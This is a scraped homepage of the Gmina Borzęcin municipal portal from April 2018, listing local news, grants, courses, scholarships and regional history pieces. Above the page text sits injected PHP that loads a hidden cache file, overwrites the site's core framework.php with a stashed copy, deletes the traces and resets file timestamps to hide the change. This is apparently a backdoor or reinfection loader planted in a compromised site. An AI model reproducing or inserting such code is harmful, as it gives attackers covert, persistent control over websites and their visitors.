$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Witaj na stronie startowej
Czwartek, 26 kwietnia 2018 r. | imieniny: Marzeny, Klaudiusza
Portal informatorbrzeski.pl: Roczna Konferencja Prasowa Gminy Borzęcin 2018 - relacja live
Konferencja prasowa Gminy Borzęcin

Konferencja prasowa Gminy Borzęcin.

Opublikowany przez Informator Brzeski 24 kwietnia 2018
Share/Save/Bookmark
 
Portal informatorbrzeski.pl: "Babskie Gotowanie" w Borzęcinie
,,Babskie Gotowanie,, w Borzęcinie

"Babskie Gotowanie" w Borzęcinie

Opublikowany przez Informator Brzeski 24 kwietnia 2018
Share/Save/Bookmark
 
Rozstrzygnięto kolejną edycję "Mistrza Intelektu"

Dnia 24.04.2018 roku w Domu Ludowym w Borzęcinie odbył się po raz kolejny "Mistrz Intelektu" zorganizowany przez Gminny...

Opublikowany przez GOK Borzęcin 25 kwietnia 2018
Share/Save/Bookmark
 
Promesa dla Gminy Borzęcin w ramach Programu "Małopolskie Boiska"
Opublikowany przez Janusz Kwaśniak 20 kwietnia 2018
Share/Save/Bookmark
 
Roczna Konferencja Prasowa Gminy Borzęcin 2018

Roczna Konferencja prasowa Gminy Borzęcin

Opublikowany przez Andrzej Gruca 24 kwietnia 2018
Share/Save/Bookmark
 
Portal malopolska.pl: Pół setki boisk w Małopolsce do remontu

ad4fa4d2910e21Do końca tegorocznych wakacji w całym regionie zostaną wyremontowane aż 54 boiska. Samorząd województwa przeznaczył na ten cel 9 mln zł. W piątek gminy i powiaty, które dołączyły do innowacyjnego projektu Małopolskie boiska, odebrały „promesy” gwarantujące dofinansowanie z budżetu województwa. Dokumenty wręczyli im wicemarszałek Wojciech Kozak i Grzegorz Lipiec, który w zarządzie województwa małopolskiego odpowiada m.in. za kwestie edukacji.

W całej Małopolsce istnieje ok. 2 tysięcy boisk, z których mogą korzystać uczniowie. Część z nich jest już niestety w dość kiepskim stanie – a trenowanie na nich może być dla dzieci i młodzieży niebezpieczne. Dlatego władze województwa postanowiły wystartować z pilotażowym projektem Małopolskie boiska, który zakłada szeroko zakrojony remont ponad półsetki przyszkolnych obiektów sportowych.

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Postanowienie nr DTA-532-1/18 Komisarza Wyborczego w Tarnowie II

Postanowienie nr DTA-532-1/18 Komisarza Wyborczego w Tarnowie II w sprawie podziału gminy Borzęcin na stałe obwody głosowania, ustalenia ich numerów, granic oraz siedzib obwodowych komisji wyborczych.

 

Pełna treść obwieszczenia dostępna pdfTUTAJ1.04 MB

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Stowarzyszenie "Kwartet na Przedgórzu" zaprasza na bezpłatne kursy

logo kwartet na przedgorzu2Stowarzyszenie „Kwartet na Przedgórzu” przystępuje do realizacji projektu, dotyczącego tworzenia warunków do podejmowania pracy w zawodach deficytowych przez osoby z grupy defaworyzowanej. W ramach operacji LGD zorganizuje pięć bezpłatnych kursów zawodowych. Mogą w nich wziąć udział osoby niepracujące, które nie przekroczyły 30. roku życia. Rozpoczęła się rekrutacja, liczba miejsc ograniczona.

Kursy odbywać się będą w jednej z placówek szkoleniowych w Brzesku i będą prowadzone z zakresu:

 • 35-godzinny kurs barmański I stopnia;
 • 14-godzinny kurs baristy I stopnia;
 • 21-godzinny kurs kelnerski I stopnia;
 • 36-godzinny kurs obsługi kas fiskalnych oraz programu do fakturowania;
 • 67-godzinny kurs obsługi wózka widłowego.

Po ukończeniu kursu jego uczestnicy otrzymają w języku polskim i angielskim uznawane na terenie Unii Europejskiej certyfikaty (kursy: barmański, baristy i kelnerski) lub certyfikat CTI (obsługa kas fiskalnych) oraz zaświadczenie kwalifikacyjne wydane przez UDT (obsługa wózka widłowego).

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
UWAGA! Program Stypendiów Pomostowych

Za kilka tygodni rusza

XVII EDYCJA PROGRAMU STYPENDIÓW POMOSTOWYCH.

„Stypendia Pomostowe” to rozbudowany program stypendialny, w którym można uzyskać stypendium na I rok i dalsze lata studiów.

Zapraszamy ambitnych i zdolnych maturzystów ze wsi i małych miejscowości, pochodzących z niezamożnych rodzin, którzy chcą studiować. W roku akademickim 2018/2019 czekają na Was stypendia na I rok studiów
w wysokości 500 zł miesięcznie, które będą wypłacane przez 10 miesięcy.

O stypendium na I rok studiów może aplikować każdy maturzysta 2018, który ukończy szkołę ponadgimnazjalną
w 2018 roku i:

 • zda dobrze maturę w bieżącym roku szkolnym
  (uzyska odpowiednią ilość punktów zgodną z wymaganiami programu);
 • zostanie przyjęty w roku akademickim 2018/2019 na I rok dziennych studiów I stopnia, lub I rok dziennych jednolitych studiów magisterskich, realizowanych w polskich publicznych uczelniach akademickich;
 • mieszka na wsi lub w mieście do 20 tys. mieszkańców;
 • pochodzi z niezamożnej rodziny
  (w której dochód na osobę nie przekracza kwoty określonej w regulaminie programu);

  a ponadto spełnia jeden z poniższych warunków:
 • pochodzi z rodziny byłego pracownika PGR
  lub
 • jest/był uczestnikiem finałowego etapu olimpiad przedmiotowych w szkole ponadgimnazjalnej
  lub
 • jest członkiem rodziny wielodzietnej lub jest/był wychowankiem rodziny zastępczej bądź państwowego domu dziecka
  lub
 • ma rekomendację lokalnej organizacji pozarządowej uczestniczącej w bieżącej edycji programu.
Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Lucjan Kołodziejski: Mieszkańcy Borzęcina i okolic polegli podczas I wojny światowej, w obronie Lwowa i w wojnie polsko-bolszewickiej

bSetna rocznica odzyskania przez Polskę niepodległości jest dobrą okazją do przypomnienia imion i nazwisk mieszkańców obecnej gminy Borzęcin, poległych w latach 1914 -1920.
Po uzyskaniu niepodległości w 1918 r. droga do ustalenia granic wiodła poprzez walki powstańcze, wojnę polsko - ukraińską i polsko - bolszewicką. W tych wielkich zmaganiach wojennych walczyli synowie borzęcińskiej ziemi, płacąc zdrowiem i życiem za wolność Polski.

W Borzęcinie pierwsze wieści o wybuchu wojny przyjęła ludność raczej z pewną nadzieją, niż z obawą. Przez stację kolejową Biadoliny jadą transporty wojskowe na wschód. Wagony udekorowane, ludność wręcza rozśpiewanym żołnierzom żywność i kwiaty, jako przyszłym zwycięzcom. W transportach tych jadą także chłopcy z Borzęcina ze swoimi pułkami austriackimi: 2 p. ułanów i 57 p. piechoty, stacjonowanymi w Tarnowie. Nadchodzą pierwsze komunikaty z potyczek na przedpolu Lublina, ludność oglądała pierwszych jadących jeńców jak ludzi z innej planety. Po 50 latach pokojowych rządów cesarza Franciszka Józefa - wybuch wojny powszechnej stanowił wskrzeszenie nadziei, o których marzył wieszcz Adam Mickiewicz, na odzyskanie niepodległości, przynajmniej w związku z monarchią Austrio - Węgierską. Ale potem przychodzą i gorsze wiadomości o klęskach. W dniu 3 września 1914 r. wojska rosyjskie zajmują Lwów. Zaczęto powoływać do służby wojskowej dalsze roczniki tj. landwerę 32 p. piechoty stacjonującą w Bochni i Nowym Sączu. Przysięga tych oddziałów odbyła się na dziedzińcu Posterunku Żandarmerii (w Borzęcinie – przyp. L.K.) wobec licznie zebranej ludności według ustalonej roty, która głosiła, że żołnierze ci będą służyć wiernie na lądzie, morzu i w powietrzu cesarzowi Austrii, królowi Węgier, Czech, Galicji i innych krajów z dodatkiem, a daj Boże w przyszłości i królowi polskiemu. Była to zachęta dla idących w bój żołnierzy, a zarazem przyrzeczenie zrealizowania planów wojennych odnośnie przyszłości ziem polskich[1].

[1]A. Kobyłecki, Borzęcin nad Uszwicą. Przegląd historyczny przemian gospodarczo-społecznych wsi małopolskiej, Kraków 1972, mps, s. 86 i 87.

Pełna treść materiału dostępna TUTAJ

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Telewizja Tarnowska.tv: Wychowanie patriotyczne w Szkole w Bielczy

W związku z przypadającą w tym roku setną rocznicą odzyskania przez Polskę Niepodległości Ministerstwo Edukacji Narodowej bieżący rok szkolny ogłosiło "Rokiem dla Niepodległej". Z tej okazji w Zespole Szkolno - Przedszkolnym w Bielczy co miesiąc organizowanych jest szereg akcji o tematyce patriotycznej. Jedną z nich, była wieczornica na którą zaproszono uczniów, rodziców, mieszkańców oraz absolwentów szkoły.
Najpierw zobaczyliśmy przedstawienie wystawione przez uczniów w którym ukazano analogie dwóch wydarzeń: Odzyskania przez Polskę Niepodległości oraz Męki i Śmierci Krzyżowej Jezusa Chrystusa, po czym odbyło się czytanie lektury Aleksandra Kamińskiego "Kamienie na szaniec".Share/Save/Bookmark
 
Zaproszenie na Piknik Rodzinny w Borzęcinie Dolnym

piknik bd 110 czerwca bieżącego roku na Stadionie Sportowym przy Zespole Szkolno - Przedszkolnym w Borzęcinie Dolnym odbędzie się kolejna edycja Pikniku Rodzinnego dla wszystkich chętnych z terenu gminy Borzęcin oraz regionu. Organizatorzy imprezy: Wójt Gminy Borzęcin Janusz Kwaśniak, Gminy Ośrodek Kultury w Borzęcinie, Zespół Szkolno – Przedszkolny w Borzęcinie Dolnym oraz Parafia w Borzęcinie Dolnym Zapraszają...

Rozpoczęcie pikniku zaplanowano na godzinę 15.00. Uczestnicy będą mogli skorzystać z bogatej oferty kulinarnej przygotowanej przez Radę Rodziców ZSP w Borzęcinie Dolnym. Na wstępie zaprezentują się uczniowie i przedszkolaki z krótkim programem artystycznym nawiązującym do 125 – lecia Publicznej Szkoły Podstawowej w Borzęcinie Dolnym. Następnie swoje umiejętności przedstawią Borzęckie Słowiki. Gościnnie wystąpi zespół „Borzęcanie”.
Po godzinie 16.00 na scenę wkroczy wodzirej, który poprowadzi zabawy integracyjne. W tej części Pikniku odbędzie się konkurs KARAOKE dla absolwentów Publicznej Szkoły Podstawowej w Borzęcinie Dolnym z okazji Jubileuszu 125-lecia funkcjonowania szkoły.

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Józef Olchawa: Okruchy naszej historii

olchawa artykulyPrzeszłość - jest to dziś, tylko cokolwiek dalej:
Za kołami to wieś,
Nie jakieś tam coś, gdzieś,
Gdzie nigdy ludzie nie bywali!

Pęknie pisał Cyprian Kamil Norwid. Różnie postrzegamy historię - najczęściej przez pryzmat książek i lekcji w szkole. Wiemy, że upadały cywilizacje, systemy polityczne, dynastie i państwa. Historia powszechna to w przeważającej części opisy wojen toczonych przez ludzkość od niepamiętnych czasów, dokumentowanie tragedii, brutalnych mordów i nieszczęść. Ale historia nie toczy się nie tylko na arenach globalnych zmagań o wpływy i władzę, historia dzieje się także obok nas, za naszym domem, w najbliższym otoczeniu. Na nas spoczywa odpowiedzialność za pamięć o tożsamości przodków oraz o ich najczęściej trudnym i pełnym wyrzeczeń życiu. Przez przypominanie dawnych wydarzeń w bardzo konkretnej przestrzeni, budujemy własną tożsamość, poczucie przynależności do danej zbiorowości i dumę z miejsc w których przyszło nam żyć. Znajomość historii w skali mikro, pozwala również na podtrzymywanie lokalnych tradycji i zwyczajów, a także praw rządzących konkretną społecznością.

W moich historycznych poszukiwaniach i kwerendach, najczęściej w prasie sprzed lat, natrafiałem na swoiste "perełki". Były to opisy zdarzeń, z pozoru nieistotnych, nie mających żadnego wpływu na bieg wielkich wydarzeń - ale właśnie ten fakt dodawał im swoistego uroku i powodował wzruszenie. Z mojego bogatego archiwum wybrałem kilka relacji prasowych dotyczących Borzęcina i jego mieszkańców. Pokazują zwykłe sprawy, jakimi żyli nasi przodkowie - ich sukcesy, radości, problemy i kłopoty. I chociaż brutalność wielkiej historii wdziera się do tych relacji, to ich wielką zaletą jest swojskość i regionalność.

Życzę przyjemnej lektury.

Przeczytaj materiał: pdfJozef Olchawa: Okruchy naszej historii250.24 KB

Share/Save/Bookmark
 
Pierwsze sukcesy młodych szachistów z Borzęcina

m.urbanski szachy 1Okiem instruktora

Od ponad dwóch lat przy Gminnym Ośrodku Kultury w Borzęcinie, odbywają się stałe zajęcia szachowe na które uczęszczają dzieci w wieku od 5 do 14 lat. Zajęcia cieszą się sporym zainteresowaniem. Są ciekawą formą na spędzanie wolnego czasu i alternatywą dla komputerów, telewizji i telefonów, które bardzo pochłaniają czas naszych pociech.

Od czasu powstania koła szachowego w naszych cotygodniowych spotkaniach wzięło udział ponad trzydzieścioro dzieci, z czego stałą grupę stanowi około 15 osób regularnie biorących udział w zajęciach i turniejach. W zdecydowanej większości są to początkujący lub w ogóle nie potrafiący grać młodzi ludzie. Po upływie tych dwóch lat można powiedzieć, że nie jest to stracony czas. Widać postępy w zdobywaniu umiejętności i zgłębianiu tajników królewskiej gry. Można nawet mówić o pierwszych sukcesach – zdecydowana większość zawodników zaczyna regularnie brać udział w turniejach szachowych regionu tarnowskiego a nawet Małopolski, gdzie mogą konfrontować swoje umiejętności z rówieśnikami.

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Lucjan Kołodziejski: Okruchy pamięci

Okladka borzecin i okolice w czasie wielkiej wojnyStanisław Urbański, Kawaler Orderu Wojennego Virtuti Militari

Stanisław Urbański urodził się 14 stycznia 1887 r. w Borzęcinie na granicy Przymiarek i Jackówki. Był synem Anny i Jakuba, rolnika. Naukę rozpoczął w Borzęcinie Górnym w szkole ludowej, a w 1909 r. ukończył II Gimnazjum w Tarnowie[ P. Marecik, Abiturienci tarnowskich szkół średnich w latach 1866- 1918. Studium z dziejów formowania się inteligencji galicyjskiej, Dębno 2014 r., praca doktorska, mps, bez paginacji.]. Studiował na Wydziale Prawa UJ w latach 1909/10– 1913/14. Jako ochotnik zgłosił się 12 września 1914 r. do Legionów. Do 8 lutego 1915 r. służył w 12 kompanii 3 Pułku Piechoty II Brygady Legionów, natomiast z dniem 1 maja 1915 r. rozpoczął służbę w intendenturze 6 Dywizjonu Artylerii. Potem na krótko przydzielony został do 4 Pułku Piechoty, skąd odkomenderowany został do Szkoły Podchorążych Legionów Polskich w Kamieńcu. Po utworzeniu 6 Pułku Piechoty (III Brygady Legionów) 28 lipca 1915 r. przydzielony został do 11. kompanii. Służył także w 9. kompanii tegoż pułku. Mianowany chorążym piechoty w dn. 15 grudnia 1915 (XII ranga, rozkaz komendy Legionów Polskich nr 178 z 15 XII 1915 r.), a następnie podporucznikiem piechoty 7 lipca 1916 r. Po wycofaniu Legionów z linii frontu pracował w służbie werbunkowej (...)

Pełna treść materiału: pdfLucjan Kołodziejski: Okruchy pamięci1.3 MB

Share/Save/Bookmark
 
Paweł Glugla: „Newsy” prasowe o XIX wiecznej Bielczy

kurjer lwowski

W poczytnej gazecie „Kurjer Lwowski” wychodzącej w XIX i XX wieku we Lwowie, znajdziemy interesujące „newsy” dotyczące nie tylko samego Borzęcina, ale i innych miejscowości – np. Bielczy.

Poniżej prezentuję cztery wyszperane dość intrygujące informacje. Jedna dotyczy morderstwa popełnionego w 1890 roku w Bielczy i relacji epilogu owego zdarzenia – mianowicie procesu sądowego w Krakowie. Drugi tekst to przypomnienie o nieco zapomnianej już postaci Adolfa Rosenberga – bielczanina, żyjącego w latach 1842-1909, patrioty, człowieka niezwykle pracowitego, który zrobił karierę. Ale zarazem i człowieka tragicznego. Trzecia informacja to migawka z odpustu w Bielczy w 1903 r., podczas którego doszło do nieszczęśliwego zdarzenia – urwania przypadkowej kobiecie nogi. Ostatni „news” dotyczy skutków alkoholizmu. Z przepicia w 1904 roku bielczanin zamarzł na śmierć. Nie było z pewnością z takiego pijaczka pożytku i tutaj na ziemi i nie ma także na drugim świecie. Alkohol, jak widać z obu „newsów nie jest dla wszystkich, ale dla wybranych.

Pełna treść materiału: pdfPaweł Glugla: Z XIX wiecznej Bielczy367.16 KB

Share/Save/Bookmark
 
Nowy sprzęt w Sokole Borzęcin

Kosa spalinowa STIHL FS89 4MIX oraz kosiarka samojezdna VIKING MT 5097Z. O taki sprzęt wzbogacił się Klub Sportowy Sokół...

Opublikowany przez Sokół Borzęcin 12 kwietnia 2018

Zobacz na facebooku

Share/Save/Bookmark
 
Portal brzesko.info.pl: Policjanci przerwali szaleńczy rajd pirata drogowego

W sobotnie popołudnie (7.04) dyżurny brzeskiej jednostki otrzymał zgłoszenie o kierowcy samochodu marki Renault, którego sposób jazdy zagraża innym uczestnikom ruchu drogowego. Z relacji świadków wynikało, że mężczyzna zjeżdża na przeciwległy pas ruchu, zajeżdża drogę innym pojazdom oraz nie ustępuje pierwszeństwa przejazdu. Interwencję natychmiast podjęli policjanci z Wydziału Ruchu Drogowego, którzy wskazany przez świadków samochód zatrzymali w Gnojniku.
Za kierownicą pojazdu siedział 36-letni mieszkaniec gminy Borzęcin, od którego wyczuwalna była woń alkoholu. Mężczyzna podczas kontroli był pobudzony i zachowywał się nerwowo, posiadał przy sobie niewielkie ilości środków odurzających. W trakcie interwencji z policjantami skontaktował się dyżurny jednostki, który przekazał im, że do komendy wpłynęło zgłoszenie o uszkodzeniu samochodu marki Toyota, którego sprawcą miał być zatrzymany przez policjantów kierujący. Okazało się, że 36-latek jadąc wcześniej drogą krajową nr 94 w miejscowości Jastew zajechał drogę kierowcy toyoty, wysiadł z pojazdu, po czym kopiąc uszkodził mu samochód i zabrał tablicę rejestracyjną.

Share/Save/Bookmark
 Dodaj do Facebook`a
PDF
Drukuj
 
Telewizja Tarnowska.tv: Wieczornica Wielkanocna w Bielczy

Tradycją stało się, że tuż po Świętach Wielkanocnych "Bielczanki z Pasją" organizują Wieczornicę Wielkanocną. To doskonała okazja do spotkania i integracji lokalnej społeczności, jak również przypomnienia, w związku z Rocznicą 100-lecia Odzyskania Niepodległości ważnych dla Narodu Polskiego wydarzeń.Share/Save/Bookmark
 
Wieczornica Wielkanocna w Bielczy - zobacz fotorelację GOK Borzęcin

 

Opublikowany przez GOK Borzęcin 9 kwietnia 2018

Zobacz na facebooku

Share/Save/Bookmark
 
<< pierwsza < poprzednia 1 2 3 4 5 6 7 8 9 10 następna > ostatnia >>

Strona 1 z 188
Gmina PryechlewoGmina Czarna
Serwis Inwestycyjny
Przetargi
Materiały wideo
Materiały Audio
Raport z powodzi
Pogoda
Money.pl - Kliknij po wicej
26 kwietnia 2018
rdo: MeteoGroup
Kursy walut
Money.pl - Serwis Finansowy nr 1
NBP 2018-04-26
USD 3,4827 +0,81%
EUR 4,2392 +0,55%
CHF 3,5397 +0,58%
GBP 4,8454 +0,49%
Wspierane przez Money.pl
Konsultacje Społeczne
© 2011 Oficjalny Portal Gminy Borzęcin
designed by Mariusz Zawistowicz, Coded by Rafał Bakalarz